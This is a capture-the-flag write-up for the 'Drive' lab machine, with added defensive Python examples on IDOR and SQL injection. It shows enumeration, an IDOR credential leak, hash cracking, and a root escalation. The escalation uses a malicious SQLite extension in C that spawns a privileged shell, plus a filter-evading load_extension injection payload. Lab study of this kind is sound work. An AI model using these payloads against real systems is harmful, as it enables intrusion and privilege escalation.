
DRIVE CTF WRITEUP

Enumeration

nmap -A -sV -sC drive.htb

Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-18 17:30 EDT
Nmap scan report for driver.htb (10.10.11.235)
Host is up (0.038s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 27:5a:9f:db:91:c3:16:e5:7d:a6:0d:6d:cb:6b:bd:4a (RSA)
|   256 9d:07:6b:c8:47:28:0d:f2:9f:81:f2:b8:c3:a6:78:53 (ECDSA)
|_  256 1d:30:34:9f:79:73:69:bd:f6:67:f3:34:3c:1f:f9:4e (ED25519)
80/tcp   open     http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://drive.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp filtered ppp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.07 seconds

nmap -p- drive.htb

Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-18 17:33 EDT
Nmap scan report for drive.htb (10.10.11.235)
Host is up (0.035s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
3000/tcp filtered ppp

Nmap done: 1 IP address (1 host up) scanned in 35.01 seconds

These two scans show three ports: 3000, which is filtered; 80, an HTTP server; and 22, SSH.

Web Enumeration

The app is probably for managing documents in the cloud.

Without registering (the application allows browsing without an account) we notice a private note in /home (./pics/interesting_file.png). We want to check whether it is possible to read the content of that note, and maybe of others, since the backend exposes them through URLs like drive.htb/100/getFileDetail/ (visible once we create an account and get session tokens).

With Burp's Intruder we go looking for all possible files in the backend and find great results (./pics/attack_burp.png). Now we just have to figure out how to read those files, since the requests respond like this:

{"status": "unauthorized"}

Then, with gobuster, let's look at all the possible paths under drive.htb/100/ to see if there is anything interesting.

gobuster dir -u http://drive.htb/100 --cookies 'Cookie: csrftoken=AlankMlxInGpRCoOAMEYbWjJ7w7WAgcT; sessionid=4ue8dm8pmi5innjghx5i08tuvdi7j49e' -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://drive.htb/100
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] Cookies:                 Cookie: csrftoken=AlankMlxInGpRCoOAMEYbWjJ7w7WAgcT; sessionid=4ue8dm8pmi5innjghx5i08tuvdi7j49e
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/updates              (Status: 302) [Size: 0] [--> /login/]
/update               (Status: 302) [Size: 0] [--> /login/]
/blocks               (Status: 302) [Size: 0] [--> /login/]
/block                (Status: 301) [Size: 0] [--> /100/block/]
/updated              (Status: 302) [Size: 0] [--> /login/]
/delete               (Status: 302) [Size: 0] [--> /login/]
Progress: 6900 / 207644 (3.32%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 6914 / 207644 (3.33%)
===============================================================
Finished
===============================================================                                                  

We notice a route /block that responds with a 301 instead of the usual 302 to /login/; interesting, let's test it right away against the hidden files!!!

Nice, we have a data leak!! (./pics/dataleak.png) We have just obtained credentials; we immediately take the foothold!!
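The root cause here is an insecure direct object reference: the file id in the URL is trusted, and one per-file route checks ownership while another does not. As an added defensive example (not code from the writeup or from the Drive application), the snippet below contrasts a route that only checks "is someone logged in" with routes that all go through a single ownership check. The Note model, the in-memory store, the ids and the function names are constructed for the demo; they mirror the writeup's getFileDetail and block routes but are not the application's code.

```python
"""Added example, not from the writeup or the Drive application's code.

The Drive backend keyed per-file routes on a numeric id in the URL
(/<id>/getFileDetail/, /<id>/block/) and enforced ownership on one route but
not the other, so an authenticated user could read other users' notes by
iterating ids. The fix is one authorization helper that every per-object route
calls. The Note model, the store and the ids below are constructed for the demo.
"""
from dataclasses import dataclass
from typing import Callable, Iterable, List, Optional


class Unauthorized(Exception):
    """Raised for anonymous callers and for notes the caller does not own."""


@dataclass(frozen=True)
class Note:
    note_id: int
    owner_id: int
    content: str


# Constructed sample store. Ids are sequential, as they were on the box, so
# guessing neighbouring ids is trivial and authorization is all that protects them.
NOTES = {
    100: Note(100, owner_id=1, content="user 1: meeting notes"),
    101: Note(101, owner_id=2, content="user 2: private note"),
    102: Note(102, owner_id=2, content="user 2: credentials draft"),
}


def get_note_detail_vulnerable(session_user_id: Optional[int], note_id: int) -> str:
    """Insecure direct object reference: only checks that *someone* is logged in."""
    if session_user_id is None:
        raise Unauthorized("login required")
    return NOTES[note_id].content  # KeyError for unknown ids, content for any known id


def authorize_note(session_user_id: Optional[int], note_id: int) -> Note:
    """Single choke point: the caller must be logged in and must own the note.

    A missing note and someone else's note produce the same error, so the
    response does not reveal which ids exist.
    """
    if session_user_id is None:
        raise Unauthorized("login required")
    note = NOTES.get(note_id)
    if note is None or note.owner_id != session_user_id:
        raise Unauthorized("unauthorized")
    return note


def get_note_detail(session_user_id: Optional[int], note_id: int) -> str:
    """Hardened /<id>/getFileDetail/."""
    return authorize_note(session_user_id, note_id).content


def block_note(session_user_id: Optional[int], note_id: int) -> dict:
    """Hardened /<id>/block/: the same check as every other per-note route."""
    note = authorize_note(session_user_id, note_id)
    return {"status": "blocked", "id": note.note_id}


def audit_access(session_user_id: int, view: Callable, ids: Iterable[int]) -> List[int]:
    """Authorization audit for a view: the ids it exposes to this user.

    Run this in the test suite for every per-object route; the result must
    contain only objects the user owns.
    """
    exposed = []
    for note_id in ids:
        try:
            view(session_user_id, note_id)
            exposed.append(note_id)
        except (Unauthorized, KeyError):
            pass
    return exposed


if __name__ == "__main__":
    ids = range(100, 104)
    print("vulnerable route exposes to user 1:", audit_access(1, get_note_detail_vulnerable, ids))
    print("hardened route exposes to user 1:  ", audit_access(1, get_note_detail, ids))
    print("hardened block exposes to user 2:  ", audit_access(2, block_note, ids))
```

The audit helper is the check a reviewer would want in CI: it walks every per-object route with a fixed user and fails the build if any id outside that user's own objects comes back, which is exactly the inconsistency between getFileDetail and block that leaked the credentials here.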

PE (Privilege Escalation)

With pwncat (a C2) we open a connection as the user martin.

python3 -m pwncat 
  'class': algorithms.Blowfish,
[10:19:27] Welcome to pwncat 🐈!                                                                                                                         __main__.py:164
(local) pwncat$ connect ssh://[email protected]
Password: *****************
[10:20:10] drive.htb:22: registered new host w/ db 

we are in!!

(remote) martin@drive:/home/martin$ whoami
martin

Enumerating the file system we notice an interesting folder inside /var/www: the backups folder. Unfortunately the files are password protected, so we have to find a way to access them.

Remembering the filtered port (3000), we note that from inside the machine we landed on we can reach the service.

curl 127.0.0.1:3000
<!DOCTYPE html>
<html lang="en-US" class="theme-">
<head>
	  <meta charset="utf-8">
	  <meta name="viewport" content="width=device-width, initial-scale=1">
	  <title> Gitea: Git with a cup of tea</title>

We notice that a Gitea service is running on the server. Let's forward the port so we can reach the web server from Kali.

ssh -L 8000:127.0.0.1:3000 [email protected]

Visiting localhost on port 8000 from Kali we can now browse the web server!!! (./pics/gitea.png)

Returning to the backups folder and analyzing the backup that is not 7zip-compressed, we notice a list of users with their password hashes.

sqlite> .tables
accounts_customuser                   auth_permission                     
accounts_customuser_groups            django_admin_log                    
accounts_customuser_user_permissions  django_content_type                 
accounts_g                            django_migrations                   
accounts_g_users                      django_session                      
auth_group                            myApp_file                          
auth_group_permissions                myApp_file_groups                   
sqlite> SELECT * FROM accounts_customuser
   ...> ;
21|sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a891323******|2022-12-26 05:48:27.497873|0|jamesMason|||[email protected]|0|1|2022-12-23 12:33:04
22|sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e7******|2022-12-24 12:55:10|0|martinCruz|||[email protected]|0|1|2022-12-23 12:35:02
23|sha1$kyvDtANaFByRUMNSXhjvMc$9e77fb56c31e7ff032f8deb1f0b5e8f42e******|2022-12-24 13:17:45|0|tomHands|||[email protected]|0|1|2022-12-23 12:37:45
24|sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d******|2022-12-24 16:51:53|0|crisDisel|||[email protected]|0|1|2022-12-23 12:39:15
30|sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c31133******|2022-12-26 05:43:40.388717|1|admin|||[email protected]|1|1|2022-12-26 05:30:58.003372

Let's try logging into Gitea as martinCruz with his old password found earlier.

We are inside and have access to the application's repository (./pics/repo.png). We can also see the script in charge of making the backups; maybe we find the password that zips them (./pics/password.png). Now we can unzip the archive with this password.

7z e 1_Nov_db_backup.sqlite3.7z -o/tmp

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7302P 16-Core Processor                (830F10),ASM,AES-NI)

Scanning the drive for archives:
1 file, 12226 bytes (12 KiB)

Extracting archive: 1_Nov_db_backup.sqlite3.7z
--
Path = 1_Nov_db_backup.sqlite3.7z
Type = 7z
Physical Size = 12226
Headers Size = 146
Method = LZMA2:22 7zAES
Solid = -
Blocks = 1

  
Enter password (will not be echoed):

Would you like to replace the existing file:
  Path:     ./db.sqlite3
  Size:     3760128 bytes (3672 KiB)
  Modified: 2022-12-26 05:51:24
with the file from archive:
  Path:     db.sqlite3
  Size:     3760128 bytes (3672 KiB)
  Modified: 2023-09-01 18:25:59
? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? y

All archives contain different hashes; maybe this one is lucky.

sqlite3 db.sqlite3 
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite> SELECT * FROM accounts_customuser;
21|sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a8913230*****|2022-12-26 05:48:27.497873|0|jamesMason|||[email protected]|0|1|2022-12-23 12:33:04
22|sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e72*****|2022-12-24 12:55:10|0|martinCruz|||[email protected]|0|1|2022-12-23 12:35:02
23|sha1$Ri2bP6RVoZD5XYGzeYWr7c$4053cb928103b6a9798b2521c4100db8896*****|2022-12-24 13:17:45|0|tomHands|||[email protected]|0|1|2022-12-23 12:37:45
24|sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d6*****|2022-12-24 16:51:53|0|crisDisel|||[email protected]|0|1|2022-12-23 12:39:15
30|sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c311337*****|2022-12-26 05:43:40.388717|1|admin|||[email protected]|1|1|2022-12-26 05:30:58.003372
sqlite>

Now we can try to crack the interesting hash with hashcat.

hashcat -m 124 hash.tom.3 /usr/share/wordlists/rockyou.txt

Nice, we have obtained the new password for tom.

Inside tom's home directory we find a script that appears to simulate the site from the command line. With simple reversing we find the passwords inside the main of the executable.

Reading the executable shows an interesting function that appears to run a SQL query.

We opt for a simple approach: loading a malicious extension into SQLite with a payload that bypasses the sanitization.

EXTENSION s.so

#include <stdio.h>
#include <stdlib.h>   /* system() */

/* constructor: runs as soon as the shared object is loaded by load_extension() */
__attribute__ ((__constructor__))
void attack(void){
  system("/bin/bash -p");
}

PAYLOAD

"+load_extension(char(46,47,115));--

"         => payload start (closes the string literal)
+         => concat char
char(...) => bypass the filter (the path is given as character codes)
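The payload only works because the binary splices the user's text into its SQL string, and SQLite's load_extension() is reachable from SQL. As an added example (not the writeup's code and not the binary in tom's home, whose real query is not shown), the snippet below runs the same payload through a concatenated query and through a parameterized one on a constructed notes table, so the difference is visible. The table, column names and query shape are assumptions.

```python
"""Added example, not code from the writeup or from the binary in tom's home.

The writeup's payload  "+load_extension(char(46,47,115));--  works only because
the binary splices user text into its SQL string. Below, the same payload is run
through a concatenated query and through a parameterized one on a constructed
notes table. The table, column names and query shape are assumptions; the real
binary's query is not shown in the writeup.
"""
import sqlite3

# char(46,47,115) is "./s", so the call is load_extension("./s"), i.e. ./s.so
PAYLOAD = '"+load_extension(char(46,47,115));--'


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the app's notes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE notes (title TEXT, content TEXT)")
    conn.executemany(
        "INSERT INTO notes VALUES (?, ?)",
        [("todo", "buy milk"), ("secret", "rotate the backup key")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, title: str) -> dict:
    """String concatenation: the caller's text becomes part of the SQL.

    SQLite accepts double-quoted string literals by default (legacy DQS), so
    the payload's leading quote closes the literal and the rest is parsed as
    SQL. Whether load_extension then fails (loading disabled, ./s missing) or
    succeeds depends only on the process; the text has already been executed
    as SQL, which is the defect. Errors are returned, not raised, so the
    caller can see what happened.
    """
    sql = 'SELECT content FROM notes WHERE title = "' + title + '"'
    try:
        rows = conn.execute(sql).fetchall()
        return {"sql": sql, "rows": rows, "error": None}
    except sqlite3.Error as exc:
        return {"sql": sql, "rows": [], "error": str(exc)}


def lookup_safe(conn: sqlite3.Connection, title: str) -> list:
    """Parameterized: the payload is compared as a value, never parsed as SQL."""
    return conn.execute(
        "SELECT content FROM notes WHERE title = ?", (title,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    bad = lookup_vulnerable(db, PAYLOAD)
    print("concatenated SQL :", bad["sql"])
    print("engine said      :", bad["error"])
    print("parameterized    :", lookup_safe(db, PAYLOAD))
    print("normal lookup    :", lookup_safe(db, "todo"))
```

Two settings matter on the defensive side: the query must be parameterized (character-level filtering of quotes or letters is what the char() trick defeats), and the process should never call sqlite3_enable_load_extension (or the equivalent in its binding) for a database that takes untrusted input, since with loading disabled the SQL-level load_extension() function refuses to run at all.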

Now we are root, but the last step is to set the PATH, because when we obtain the root shell the system doesn't load it.

export PATH=/bin
